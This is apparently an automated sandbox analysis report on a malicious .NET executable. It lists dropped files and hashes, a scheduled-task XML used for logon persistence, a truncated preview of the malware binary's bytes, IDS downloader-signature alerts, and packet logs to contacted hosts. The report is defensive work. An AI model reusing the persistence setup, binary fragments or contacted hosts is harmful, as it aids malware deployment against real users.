SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mslla4e.bun.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axf4oqit.uho.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jsfpo23f.5dm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpnetthu.zlr.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mlfkkmvf.l5m.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbtjyv2p.3cq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqeusgs0.ea2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp5423.tmp

Download File

Process:	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.094399102336921
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtexvn:cgergYrFdOFzOzN33ODOiDdKrsuTSv
MD5:	60495167E9290F15A6C1A65F355D79D3
SHA1:	FF28871FFE7070DBBC9BACE649642286B4988639
SHA-256:	89DC922D44F3EED254AFF090967D6244449E299DDBBFFFFDF2B5F56F8BFAE763
SHA-512:	129559656BFA9673210303D070F1A17C836E142C820732511BBAA493A8CE5B2AE3CCFDB75EDCFB96E4862BD06E1AB07B9F1C8DA19F8C184C45A2B0DC7B08A9BB
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp6B55.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\AcEnrS.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.094399102336921
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtexvn:cgergYrFdOFzOzN33ODOiDdKrsuTSv
MD5:	60495167E9290F15A6C1A65F355D79D3
SHA1:	FF28871FFE7070DBBC9BACE649642286B4988639
SHA-256:	89DC922D44F3EED254AFF090967D6244449E299DDBBFFFFDF2B5F56F8BFAE763
SHA-512:	129559656BFA9673210303D070F1A17C836E142C820732511BBAA493A8CE5B2AE3CCFDB75EDCFB96E4862BD06E1AB07B9F1C8DA19F8C184C45A2B0DC7B08A9BB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\AcEnrS.exe

Download File

Process:	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	769536
Entropy (8bit):	7.739123825883422
Encrypted:	false
SSDEEP:	12288:L3TmP4kyFSnIZgc1D7COp2JwlmsxS4kZHtfi390V+KA7rC7LOmDZ:2gBOI9D7CO0JqTSRNfiQsG7LOmD
MD5:	102C9CE1C659517C4EA924C2044305B7
SHA1:	942B0A7E2077ECA38B9B6FF16D89722CBBBF7002
SHA-256:	B31CBC6EC2EB2B790C422F0F960BB1436106D92958703CB005CCDEF38887E310
SHA-512:	ECA6ED6A871E9FBEE67FEB73534BFF544F052D6B3E1058A68B4602F159F089193F0F576384E6CD49373D50200D71BB4AEADD151C0FB81A77A6246849AF2F39F6
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M...............0.................. ........@.. ....................... ............@.................................~...O.......<...........................t...p............................................ ............... ..H............text....... ...................... ..`.rsrc...<...........................@..@.reloc..............................@..B........................H.......<_...C..........D...0...........................................z..}......}.....(.......(.......0..P..........{....o.....{....o....(.........,"...{....o.....{....o.....(......+....}......0..\.........r...p(......,..r...pr)..p(....&..}......r...p(......,..r7..pr)..p(....&..}......{.....+..*.0...........r...p.r...p.~N...s.......o.....~O......s......r_..p.s........o......o....&..o.....+....o....( ......o....( ......o!.......-..o".......,7...(#.......,.rm..pr)..p(....&+

C:\Users\user\AppData\Roaming\AcEnrS.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.739123825883422
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	WIpGif4IRrFfamQ.exe
File size:	769'536 bytes
MD5:	102c9ce1c659517c4ea924c2044305b7
SHA1:	942b0a7e2077eca38b9b6ff16d89722cbbbf7002
SHA256:	b31cbc6ec2eb2b790c422f0f960bb1436106d92958703cb005ccdef38887e310
SHA512:	eca6ed6a871e9fbee67feb73534bff544f052d6b3e1058a68b4602f159f089193f0f576384e6cd49373d50200d71bb4aeadd151c0fb81a77a6246849af2f39f6
SSDEEP:	12288:L3TmP4kyFSnIZgc1D7COp2JwlmsxS4kZHtfi390V+KA7rC7LOmDZ:2gBOI9D7CO0JqTSRNfiQsG7LOmD
TLSH:	E0F4D0D43F36B71ACEB85A71852ADDF552A52D68B000B9E36DCD3B87359D211AE0CF02
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M................0.................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4bd1d2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x89F24D9A [Mon May 4 13:16:10 2043 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbd17e	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbe000	0x63c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xbba74	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbb1d8	0xbb200	5094a3c6267c9f5b62ae3c445402c28d	False	0.8930817363894455	data	7.746536493454694	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xbe000	0x63c	0x800	b08b6e10692e55e6b06363d69f7c0f72	False	0.33935546875	data	3.494372142259968	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc0000	0xc	0x200	5e8896b904698a63138a8bd1cc321187	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xbe090	0x3ac	data			0.4148936170212766
RT_MANIFEST	0xbe44c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-01T10:55:00.305766+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49707	193.122.6.168	80	TCP
2024-10-01T10:55:04.199520+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49707	193.122.6.168	80	TCP
2024-10-01T10:55:04.725323+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49711	188.114.97.3	443	TCP
2024-10-01T10:55:16.227656+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49713	193.122.6.168	80	TCP
2024-10-01T10:55:24.758931+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49722	193.122.6.168	80	TCP
2024-10-01T10:55:33.647819+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49736	188.114.97.3	443	TCP
2024-10-01T10:55:36.431164+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49743	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 10:54:59.377123117 CEST	49707	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:54:59.382128954 CEST	80	49707	193.122.6.168	192.168.2.5
Oct 1, 2024 10:54:59.382208109 CEST	49707	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:54:59.382452011 CEST	49707	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:54:59.387185097 CEST	80	49707	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:00.042814970 CEST	80	49707	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:00.069933891 CEST	49707	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:00.075320005 CEST	80	49707	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:00.255995035 CEST	80	49707	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:00.305766106 CEST	49707	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:00.358153105 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:00.358182907 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:00.358238935 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:00.366811037 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:00.366837978 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:00.833781004 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:00.833909988 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:00.877989054 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:00.878046036 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:00.878464937 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:00.930838108 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:01.444878101 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:01.491419077 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:01.975202084 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:01.975296974 CEST	443	49708	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:01.975496054 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:02.030278921 CEST	49708	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:02.033912897 CEST	49707	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:02.038824081 CEST	80	49707	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:04.006131887 CEST	80	49707	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:04.099447012 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:04.099546909 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:04.099668026 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:04.100610018 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:04.100646019 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:04.199520111 CEST	49707	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:04.573545933 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:04.586319923 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:04.586396933 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:04.643974066 CEST	49712	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:04.649193048 CEST	80	49712	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:04.649324894 CEST	49712	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:04.653181076 CEST	49712	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:04.658082008 CEST	80	49712	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:04.725339890 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:04.725440979 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:04.725574970 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:04.726414919 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:04.735552073 CEST	49707	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:04.736669064 CEST	49713	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:04.740701914 CEST	80	49707	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:04.740781069 CEST	49707	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:04.741544008 CEST	80	49713	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:04.741624117 CEST	49713	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:04.741929054 CEST	49713	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:04.747422934 CEST	80	49713	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:16.176819086 CEST	80	49713	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:16.178464890 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:16.178580999 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:16.178659916 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:16.178989887 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:16.179025888 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:16.227655888 CEST	49713	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:16.638540983 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:16.648904085 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:16.648982048 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:16.786484957 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:16.786585093 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:16.786664963 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:16.787543058 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:16.791218042 CEST	49713	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:16.792844057 CEST	49722	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:16.796996117 CEST	80	49713	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:16.797084093 CEST	49713	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:16.797612906 CEST	80	49722	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:16.797801018 CEST	49722	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:16.797909021 CEST	49722	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:16.802591085 CEST	80	49722	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:19.270039082 CEST	80	49712	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:19.321475029 CEST	49712	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:24.710340023 CEST	80	49722	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:24.719551086 CEST	49726	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:24.724574089 CEST	80	49726	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:24.724703074 CEST	49726	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:24.724757910 CEST	49726	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:24.729629040 CEST	80	49726	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:24.758930922 CEST	49722	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:28.482067108 CEST	80	49726	193.122.6.168	192.168.2.5
Oct 1, 2024 10:55:28.490905046 CEST	49728	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:28.490957975 CEST	443	49728	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:28.491075039 CEST	49728	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:28.491786957 CEST	49728	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:28.491803885 CEST	443	49728	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:28.524557114 CEST	49726	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:28.954590082 CEST	443	49728	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:28.956828117 CEST	49728	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:28.956859112 CEST	443	49728	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:29.086847067 CEST	443	49728	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:29.087455988 CEST	443	49728	188.114.97.3	192.168.2.5
Oct 1, 2024 10:55:29.087527990 CEST	49728	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:29.087888956 CEST	49728	443	192.168.2.5	188.114.97.3
Oct 1, 2024 10:55:29.096961975 CEST	49726	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:29.097619057 CEST	49730	80	192.168.2.5	193.122.6.168
Oct 1, 2024 10:55:29.102153063 CEST	80	49726	193.122.6.168	192.168.2.5
